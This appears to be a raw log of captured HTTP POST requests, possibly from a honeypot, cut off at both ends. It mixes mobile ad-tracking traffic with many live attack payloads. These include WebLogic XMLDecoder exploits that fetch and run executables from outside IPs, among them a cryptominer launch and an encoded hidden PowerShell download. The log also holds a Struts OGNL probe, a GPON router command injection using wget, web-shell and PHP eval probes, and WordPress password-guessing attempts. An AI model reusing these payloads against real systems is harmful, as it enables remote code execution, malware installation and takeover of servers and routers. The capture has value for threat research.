Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /login.action HTTP/1.1
Host:64.137.249.101:80
Accept-Language: zh_CN
User-Agent: Auto Spider 1.0
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 471
Content-Type: application/x-www-form-urlencoded
redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22security_%22),%23resp.getWriter().print(%22check%22),%23resp.getWriter().flush(),%23resp.getWriter().close()}
POST http://check.proxyradar.com/azenv.php?auth=149611755585&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /onvif/device_service HTTP/1.1
Host: x.x.x.x:80
User-Agent: gSOAP/2.8
Content-Length: 1889
Connection: close
Content-Type: application/soap+xml; charset=utf-8; action="http://www.onvif.org/ver10/device/wsdl/GetDeviceInformation"
Soapaction: "http://www.onvif.org/ver10/device/wsdl/GetDeviceInformation"
Accept-Encoding: gzip
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope" xmlns:SOAP-ENC="http://www.w3.org/2003/05/soap-encoding" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsdd="http://schemas.xmlsoap.org/ws/2005/04/discovery" xmlns:chan="http://schemas.microsoft.com/ws/2005/02/duplex" xmlns:wsa5="http://www.w3.org/2005/08/addressing" xmlns:OLD-SOAP-ENV="http://tempuri.org/OLD-SOAP-ENV.xsd" xmlns:c14n="http://www.w3.org/2001/10/xml-exc-c14n#" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" xmlns:xenc="http://www.w3.org/2001/04/xmlenc#" xmlns:wsc="http://schemas.xmlsoap.org/ws/2005/02/sc" xmlns:ds="http://www.w3.org/2000/09/xmldsig#" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:xmime="http://tempuri.org/xmime.xsd" xmlns:xop="http://www.w3.org/2004/08/xop/include" xmlns:tt="http://www.onvif.org/ver10/schema" xmlns:wsrfbf="http://docs.oasis-open.org/wsrf/bf-2" xmlns:wstop="http://docs.oasis-open.org/wsn/t-1" xmlns:wsrfr="http://docs.oasis-open.org/wsrf/r-2" xmlns:tds="http://www.onvif.org/ver10/device/wsdl">
<SOAP-ENV:Header>
<wsse:Security SOAP-ENV:mustUnderstand="true">
<wsse:UsernameToken wsu:Id="">
<wsse:Username>admin</wsse:Username>
<wsse:Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">PjjWVakHg4uoSfxdELYCzYEhvqg=</wsse:Password>
<wsse:Nonce>Y2E1YTAwMDA0MjY5NThkMjRlYTE=</wsse:Nonce>
<wsu:Created>2017-04-02T20:26:21Z</wsu:Created>
</wsse:UsernameToken>
</wsse:Security>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<tds:GetDeviceInformation></tds:GetDeviceInformation>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1424
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/xdxdxd.exe&apos;,&apos;C:/Windows/temp/xdxdxd.exe&apos;);Start-Process &apos;C:/Windows/temp/xdxdxd.exe -o 213.32.29.143:14444 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ -p x -B&apos;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 384
Cache-Control: no-cache
Q6YNxI+bYJ6zsamot0iFG1pRmwMxyIEMrPHe2DHVQgQYwSAQmgsHxpBrs+cU37mmy4cI1GsCdNccmHGQPPrgM9HKyRiPH9nbLgQRei21bxnkgMI8+opBkjNdZClI0oTgSjcPl1VOX+hNbaq4L6EsSClmClQfEDqRLGRdEGmHqaKsNFm991yYRSCmMLTrmdM+NFh2x2SdVtq2/WpQLqZ4KCVXFsAohxVhLDv2dvhayH6AQ3LxHJpW9/dVjIo1ALYcXZQ4V59OBXKPDAnPcySmug96Fsl6MgXzvgxV7RueHydGF3IsG8vV89qNm71bK26bs8VlG5DWxMCN+YUKuvend5BiEdXQu2KXBMzJhil7IW5Ey8CnJH67bCnb3Q8CNJ8=
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅGˇuÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î·/Y›∆√«∆fl
POST /command.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Host: x.x.x.x:80
Connection: keep-alive
cmd=cat%20/var/passwd
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache
log=172&pwd=1728888
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅÜôOÃÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÆ˛Y›∆√«∆fl
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Ål»9≤Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÅ Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 444
Cache-Control: no-cache
RKxdyNLANZ9GvMXQ7bV9F3FnXoGn7qCLmXWEcOqP3PXFr/kGOhdQIIq3wSpCAZIknCtIV91pF95q95f/iwCrTBAFfXquof+/iBgnKIUSEaqqwryPDyOpKh9wDiTo7XzfifqDV7MausQibjtWE5e8JdkM1oYsvdFK6OSsuZTYOFkElpgAvflTgQgDN8SNNokA6cGBvepxO0/iTRjaA45e2+5IyGhlCrvx/nNLDvdMmj8Jip15BBNpDsOEggYF/zsv0RmBzL7z64/o7Gtrl5YsLLbX7R6vCpK9MxAJqK+A1oqXkPpRgLJ66IgKa/nPp0tna9jTdxeCcaKBARjrbGv6OehTFcjiMDhp6C1g+asz/taWIT5O3EOjHoHBCucnvyKyGKQpj6YHMCaU+3I/KljBtilduI0K5+ndOpUhqknbToMiWuBikJF6L6xtwQ==
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1061
Content-Type: multipart/form-data; boundary=WVQUo86DTfO1_K2l_voKKuS4Oj6nKeNzwFCH8
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--WVQUo86DTfO1_K2l_voKKuS4Oj6nKeNzwFCH8
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--WVQUo86DTfO1_K2l_voKKuS4Oj6nKeNzwFCH8
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
463179
--WVQUo86DTfO1_K2l_voKKuS4Oj6nKeNzwFCH8
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
2f43c130eaa57650e3c339dfeffc6aa2
--WVQUo86DTfO1_K2l_voKKuS4Oj6nKeNzwFCH8
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--WVQUo86DTfO1_K2l_voKKuS4Oj6nKeNzwFCH8
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--WVQUo86DTfO1_K2l_voKKuS4Oj6nKeNzwFCH8--
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Åô¶F&Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¥Ò2Y›∆√«∆fl
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∂”âÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îıÒY›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache
FvQNk9PPNbWbBENdUhGqVhY0fNfYfXmvBCohuXLdEgbVyqddyV6TJFilzjm+yDgrVxdU1puy3TIjs+p0FugZX/9ztMtdiJfi7Z0fTsSNgV+pfxTjIjcvRz18bqWOwHfoV7te7Ght13fMBjk8INffOLb9JNqg0JK7WcPkCHgZedKJ4r4NyOfKKIYWgHIFZGXtFelQ+bCwiJRYCaeR2fm7Ux5vWFnoYBElryyYKZ4EL4G/nOq8DcR+lGvq6zvoHK+uLhoBOGuPdyVfrzQxqIQy1L4mK0a2s6lLXK5JXbzotB0BDUTl78Mp3YirkVbrYBQ/G5L/S4VlhOrFItVUOgzHIpkjz8BbNgk7qwgKe6cSTLW1w+eoG60BYOUMKFjkZeKa/P2ommk=
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 18
Cache-Control: no-cache
log=admin&pwd=4444
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
Content-Type: gzip, deflate
Accept: */*
Content-Length: 103
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://149.28.96.126/80`&ipv=0
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
leng=die((string)(111111111*9));
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 372
Cache-Control: no-cache
FvMMwNudMa34e5CXwueLNwTB+h6STsXnUrsshjA4rXuuOCcN4kD6ToO8QHc5jB66ZgTcTjwepzOoD/uDMMMtoF7LFxQYwGleFotZ8jLOBaC+nkrm1wKPnV9JKF06Ww1Uu5RK0cTidrI/w6Sv0/7AoYQRv9EavVOR7iL91SfAExW24UIbBzcVjBooyLCrTvAsgjmY8YHBKqWrxm7G6rNIORKHhGPabk+KYIGeE/GZAbjTeuy1hHetqW71k/oB30kct7J+bP+Hi1lPYRWQ5kdR5hJs9Qe3eiMwuuSlsEAOwM17cxjH/P86Y5Py8UaOaUEg8T0r91TfHBwOTitkOE1buKm+2ziwN5rBqwm1jyQ/f3SkN3hQT//Z
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å®}fi›Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î(π+Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADAALgAyADUALgAxADQAOAAuADIAMAAyAC8AaQBtAGEAZwBlAHMALwB0AGUAcwB0AC8ARABMAC4AcABoAHAAJwApADsA</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://api.vungle.com/api/v4/config HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 84
{"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}
POST http://t12.proxy-checks.com/favicon.ico HTTP/1.1
Host: t12.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅpÈ!3Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl
POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 231
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=17&ac=50&pos=34106&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.native","des":"","sug":-1}]
POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
h=die('Hello, Peppa!'.(string)(111111111*9));
POST / HTTP/1.1
Content-Type: application/json; charset=utf-8
Content-Length: 272
Host: x.x.x.x
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/3.2.0
JjgLpJThhPlCRCZKjJDmQkmFe0K6eBC4Ag2ypIRPNLTLbgH4ZK/1pK9VdnFiTqgGuZTVOd/dTRFg
7NPYHwj1hpDl5FQyTmkJUluGphomv7RkCpZWMw66G6+Iv22FYvwqjkcZQMAPcvM8f0MfepXYgt+P
pXjTsw1afq+mDCOYJo52GWJnWCkOa/TYebHJzPnw92q3LN+o2WP88MIcwLEiZwUp1NVx0CCbqv6R
PQBhvH2p+LgqXgI4h8lOcpLBM5h/lVnTAHRf69E=
POST http://check.proxyradar.com/azenv.php?auth=152329428127&a=PSCMN&i=1082776602&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1301
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;@echo open 46.101.137.203&gt;sss.txt&amp;@echo binary&gt;&gt;sss.txt&amp;@echo get /taskhostxz.exe&gt;&gt;sss.txt&amp;@echo quit&gt;&gt;sss.txt&amp;@ftp -s:sss.txt -v -A&amp;@start taskhostxz.exe&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1049
Content-Type: multipart/form-data; boundary=q0xTI-al1hl5T4GFoYk0mKQfanUjTl-luzu
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--q0xTI-al1hl5T4GFoYk0mKQfanUjTl-luzu
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--q0xTI-al1hl5T4GFoYk0mKQfanUjTl-luzu
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
798627
--q0xTI-al1hl5T4GFoYk0mKQfanUjTl-luzu
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
71f8b0cd9df76b3b972215c5c55e647e
--q0xTI-al1hl5T4GFoYk0mKQfanUjTl-luzu
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--q0xTI-al1hl5T4GFoYk0mKQfanUjTl-luzu
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--q0xTI-al1hl5T4GFoYk0mKQfanUjTl-luzu--
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Ål»9≤Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÅ Y›∆√«∆fl
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅNà§Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îê˜Y›∆√«∆fl
POST /UD/act?1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:schemas-upnp-org:service:LANHostConfigManagement:1#SetDHCPServerConfigurable
Content-Type: text/xml
Host: x.x.x.x:7547
Content-Length: 420
Connection: Keep-Alive
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<u:SetDHCPServerConfigurable xmlns:u="urn:schemas-upnp-org:service:LANHostConfigManagement:1">
<NewDHCPServerConfigurable>1</NewDHCPServerConfigurable>
</u:SetDHCPServerConfigurable>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
POST http://d.applovin.com/device?api_key=xspEme-PgTSApB2pv5Z2wJD07-1BTL-PCndyPcM54qFu_HhvNFyHZAIg9Ktcfr0sbdp0FA5J-LB-ctu_6qGg-Z HTTP/1.1
Content-Type: application/json; charset=utf-8
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: d.applovin.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 944
{"app_info":{"package_name":"com.virgil.basketball","ic":true,"installed_at":1494391549000,"app_version":"3.6","first_install":"false","applovin_sdk_version":"6.3.2","app_name":"Basketball Mania"},"device_info":{"os":"4.4.4","model":"MI 4LTE","tz_offset":7,"locale":"in_ID","sdk_version":19,"dnt":false,"type":"android","country_code":"ID","revision":"cancro","carrier":"TELKOMSEL","brand":"Xiaomi","orientation_lock":"portrait","idfa":"8776479c-11a4-48e7-8a70-96e640a29187","wvvc":0},"stats":{"ad_req":135,"FetchNextAd_time":2355679,"SubmitData_time":345802,"RepeatSubmitData_time":298343,"RenderAd_time":1148002,"TaskDispatchPostback_time":311042,"ad_session_start":1495520632845,"FetchNextAd_count":133,"RepeatFetchNextAd_time":437751,"RepeatFetchNextAd_count":19,"RepeatSubmitData_count":15,"TaskDispatchPostback_count":29,"TaskCollectAdvertisingId_time":15900,"TaskCollectAdvertisingId_count":29,"SubmitData_count":25,"RenderAd_count":47}}
POST http://check.proxyradar.com/azenv.php?auth=152812500905&a=PSCMN&i=759092145&p=3128 HTTP/1.1
Cookie: testCookie=true
